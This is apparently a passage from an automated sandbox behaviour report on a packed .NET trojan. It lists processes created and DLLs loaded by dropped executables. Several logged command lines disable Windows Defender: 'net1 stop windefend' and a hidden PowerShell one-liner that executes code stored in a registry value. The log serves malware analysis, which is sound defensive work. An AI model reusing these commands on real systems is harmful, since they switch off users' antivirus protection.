Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptbase.dll
